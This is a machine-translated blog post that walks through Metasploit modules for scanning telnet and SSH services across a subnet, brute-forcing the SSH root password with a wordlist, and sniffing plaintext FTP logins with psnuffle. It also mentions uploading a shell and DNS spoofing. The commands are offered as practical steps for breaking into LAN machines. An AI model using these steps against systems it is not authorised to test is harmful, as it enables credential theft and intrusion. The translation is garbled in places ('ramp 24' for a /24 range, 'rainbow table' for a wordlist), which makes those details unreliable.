Shulou(Shulou.com)06/01 Report--

Sometimes we use Nmap to find the port and the server on the server, but we are not professional hack, many times we can only break FTP sharing and telnet, although low-end, but if you are already in a local area network, the above three servers must exist.

Use telnet to scan

Search telnet_version lookup telnet scan module

Use auxiliary/scanner/telnet/telnet_version uses this module

> set RHOSTS 192.168.1.0 ramp 24 scans the entire network segment

Setting threads for set THREADS 100. this value can be defined by yourself

> run

Use ssh to scan

Search ssh_version lookup ssh scan module

This version of use auxiliary/scanner/telnet/ssh_version may be something else

> set RHOSTS 192.168.1.0 ramp 24 scans the entire network segment

Setting threads for set THREADS 100. this value can be defined by yourself

> run

The method of scanning with services is more or less the same. If you want to scan with other services, you can first

> search name_version scans out which services are supported. Of course, this is a process of accumulation, commonly used scanning and oracle Mssql mysql, etc. Of course, most of the time we are blind, and Nmap is enough to solve the problem. More often, we use this tool to prepare for later guessing and monitoring. Here are some guessing methods.

Guessing of SSH Service password

SSH server is equivalent to FTP under windows. I don't think most administrators will configure passwords, because SSH can be encrypted and verified through public key pairs, and it is difficult to guess. Of course, some administrators may set account passwords, so we can use the following command to guess. Of course, you have to have a big enough rainbow table.

> if you are proficient in search ssh, you can hit the path directly. Anyway, I can't remember it, and there are so many modules that it is difficult to master all of them in a short time.

Use auxiliary/scanner/ssh/ssh_login selects ssh password guessing module

> set RHOSTS 192.168.1.105 set up hosts

> set USERNAME root sets the user name to root

> set set PASS_FILE/root/password.txt is a dictionary made by myself. There are many tools. Whether it is good or bad lies in the dictionary.

> set THREADS 50 sets the number of threads. If this setting is too much, it may crash, and the service will be denied. If the setting is less, the guess will be slow.

> run

Because I don't joke about my career, I've only tested it in my own environment, so it's not always good to judge the effect.

FTP sniffer tool psnuffle

This tool is used to detect FTP transmitted in plaintext, so WYSIWYG, cracking the intranet is very useful, especially in the win system, if you are using the FTP service built by IIS, then the account you sniff must have user permission, and then you want to go. If you use FTP software, this account is of little use even if you get personal feelings, unless you can get write permission, so you can upload shell. All right, without further discussion, let's take a look at how to use psnuffle as a mouth-winding tool:

> use auxiliary/sniffer/psnuffle

> run

Of course, if you determine the port can also impose some restrictions, use the set command, this sniffing may need to be open for a few hours, because no one knows when someone will log in to FTP, sometimes I am in the local area network, I would rather do DNS cheating, feel that this is more simple and violent, of course, may be directly caught by the firewall, hehe

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.